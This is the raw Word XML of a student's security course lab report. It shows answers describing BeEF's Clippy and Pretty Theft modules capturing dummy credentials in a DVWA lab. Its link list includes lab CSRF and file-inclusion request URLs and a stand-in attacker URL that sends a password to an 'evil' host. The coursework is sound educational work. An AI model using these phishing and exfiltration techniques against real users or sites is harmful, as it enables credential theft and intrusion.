          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1AC21" w14:textId="266B13F1" w:rsidR="00D16C51" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I performed this attack my using the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Clippy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8C7D5" w14:textId="21473AEE" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AC7C60" w14:textId="10F4FDD5" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Here is what was displayed in the victim browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA8D54" w14:textId="45E3426E" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84B37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64B096CC" wp14:editId="6595FBA1">
            <wp:extent cx="1924319" cy="2448267"/>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24319" cy="2448267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7841DD" w14:textId="4607C13E" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>If I press Yes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D31DA" w14:textId="621199EC" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84B37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30517778" wp14:editId="4060F130">
            <wp:extent cx="1695687" cy="218152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95687" cy="2181529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AEA9E" w14:textId="7789E5AD" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And then I see this result in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> control panel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D0D6C" w14:textId="376FFFFC" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84B37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6E6AF0" wp14:editId="0D094385">
            <wp:extent cx="2314898" cy="724001"/>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14898" cy="724001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC4900" w14:textId="71499C69" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674DC198" w14:textId="77777777" w:rsidR="00D86DBC" w:rsidRDefault="00D86DBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30026799" w14:textId="03301978" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C6136" w14:textId="26EEC0C8" w:rsidR="00D84B37" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I performed this attack using the “Pretty Theft” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command. After I had executed the command, I saw this in my browser window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A099B" w14:textId="145F648A" w:rsidR="00124779" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA0C4D2" w14:textId="306679B3" w:rsidR="00124779" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00124779">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6769A9AA" wp14:editId="0B39C67C">
            <wp:extent cx="5943600" cy="35896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589655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6657859E" w14:textId="3BA74FCD" w:rsidR="00124779" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAD3CB3" w14:textId="211B1FC0" w:rsidR="00124779" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I entered an email of “foo” and a password of “bar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pressed “Log in”. The command result in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> control panel was the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BDAC90" w14:textId="628534C9" w:rsidR="00124779" w:rsidRPr="00D84B37" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00124779">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B46E135" wp14:editId="593A6E17">
            <wp:extent cx="2343477" cy="676369"/>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43477" cy="676369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00124779" w:rsidRPr="00D84B37">
      <w:headerReference w:type="default" r:id="rId8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F4A6F" w14:textId="77777777" w:rsidR="00D167C3" w:rsidRDefault="00D167C3" w:rsidP="0019740A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40B98024" w14:textId="77777777" w:rsidR="00D167C3" w:rsidRDefault="00D167C3" w:rsidP="00197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A9BF9" w14:textId="77777777" w:rsidR="00D167C3" w:rsidRDefault="00D167C3" w:rsidP="0019740A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="11CBB86C" w14:textId="77777777" w:rsidR="00D167C3" w:rsidRDefault="00D167C3" w:rsidP="00197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AE2EB" w14:textId="409D6E78" w:rsidR="0019740A" w:rsidRPr="0019740A" w:rsidRDefault="0019740A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="0019740A">
      <w:t>COMP 4108 Assignment 4</w:t>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:t>Shane Bishop 101030053</w:t>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r w:rsidR="00D167C3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00D167C3">
      <w:instrText xml:space="preserve"> NUMPAGES  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidR="00D167C3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="0019740A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00D167C3">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33D"/>
    <w:rsid w:val="00035293"/>
    <w:rsid w:val="000A6CE5"/>
    <w:rsid w:val="000A7710"/>
    <w:rsid w:val="000B3EF1"/>
    <w:rsid w:val="000F5C7B"/>
    <w:rsid w:val="00124779"/>
    <w:rsid w:val="0018253E"/>
    <w:rsid w:val="0019740A"/>
    <w:rsid w:val="001E73BC"/>
    <w:rsid w:val="002074FC"/>
    <w:rsid w:val="002B4ED5"/>
    <w:rsid w:val="002C5263"/>
    <w:rsid w:val="002C585B"/>
    <w:rsid w:val="002F24A6"/>
    <w:rsid w:val="003A21ED"/>
    <w:rsid w:val="003C437A"/>
    <w:rsid w:val="00435115"/>
    <w:rsid w:val="00446332"/>
    <w:rsid w:val="00491201"/>
    <w:rsid w:val="004B687E"/>
    <w:rsid w:val="004D4151"/>
    <w:rsid w:val="004E0D83"/>
    <w:rsid w:val="004F79FA"/>
    <w:rsid w:val="00586CB5"/>
    <w:rsid w:val="006D71D5"/>
    <w:rsid w:val="007479A9"/>
    <w:rsid w:val="00750880"/>
    <w:rsid w:val="007C238D"/>
    <w:rsid w:val="007C65E5"/>
    <w:rsid w:val="00845514"/>
    <w:rsid w:val="008E3BEE"/>
    <w:rsid w:val="0091112D"/>
    <w:rsid w:val="00936B2D"/>
    <w:rsid w:val="00993907"/>
    <w:rsid w:val="00A10409"/>
    <w:rsid w:val="00A6133D"/>
    <w:rsid w:val="00A65D60"/>
    <w:rsid w:val="00A80EA0"/>
    <w:rsid w:val="00AB2BEB"/>
    <w:rsid w:val="00AB5AD9"/>
    <w:rsid w:val="00B0203F"/>
    <w:rsid w:val="00B15F5C"/>
    <w:rsid w:val="00C066A3"/>
    <w:rsid w:val="00C13485"/>
    <w:rsid w:val="00CA35B5"/>
    <w:rsid w:val="00D04154"/>
    <w:rsid w:val="00D167C3"/>
    <w:rsid w:val="00D16C51"/>
    <w:rsid w:val="00D442D1"/>
    <w:rsid w:val="00D56429"/>
    <w:rsid w:val="00D63BAF"/>
    <w:rsid w:val="00D80F6A"/>
    <w:rsid w:val="00D84B37"/>
    <w:rsid w:val="00D86DBC"/>
    <w:rsid w:val="00D956D8"/>
    <w:rsid w:val="00DD1660"/>
    <w:rsid w:val="00DD715E"/>
    <w:rsid w:val="00DF138C"/>
    <w:rsid w:val="00E14996"/>
    <w:rsid w:val="00E17A25"/>
    <w:rsid w:val="00E34E8D"/>
    <w:rsid w:val="00E5102B"/>
    <w:rsid w:val="00E918FC"/>
    <w:rsid w:val="00EA6DB0"/>
    <w:rsid w:val="00F262E2"/>
    <w:rsid w:val="00FC4C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F7C0E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D8548D58-5478-46BC-B40A-90D3230FD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74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6133D"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0019740A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="0019740A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00197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40A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00197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40A"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D63BAF"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D63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image" Target="media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.myevilwebsite2893.com/steal_password?password=mysecretword" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.pn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hyperlink" Target="http://comp4108.ca:9999/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/csrf/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/csrf/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer"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5.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.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hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/exec/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/csrf/?password_new=test&amp;test_conf=test&amp;Change=Change" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/fi/?page=/var/www/secret_b.php" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/xss_s/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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hyperlink" Target="http://comp4108.ca:9999/dvwa/vulnerabilities/xss_s/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scx2.b-cdn.net/gfx/news/2018/hack.jpg" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/beefproject/beef/archive/master.zip"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file:///C:/Users/shane/Documents/0-Shane/School/COMP%204108/a4/csrf_exploit.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:/Users/shane/Documents/0-Shane/School/COMP%204108/a4/csrf_exploit.html" TargetMode="External"/><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image" Target="media/image4.png"/><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hyperlink" Target="https://scx2.b-cdn.net/gfx/news/2018/hack.jpg" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId8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0.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.eregi.php" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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3C20B-5E68-4F9C-BE08-1937A111F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27</Pages>
  <Words>2924</Words>
  <Characters>1667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Bishop</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Shane Bishop</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <cp:lastPrinted>2020-11-16T19:38:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-05T15:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-20T23:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>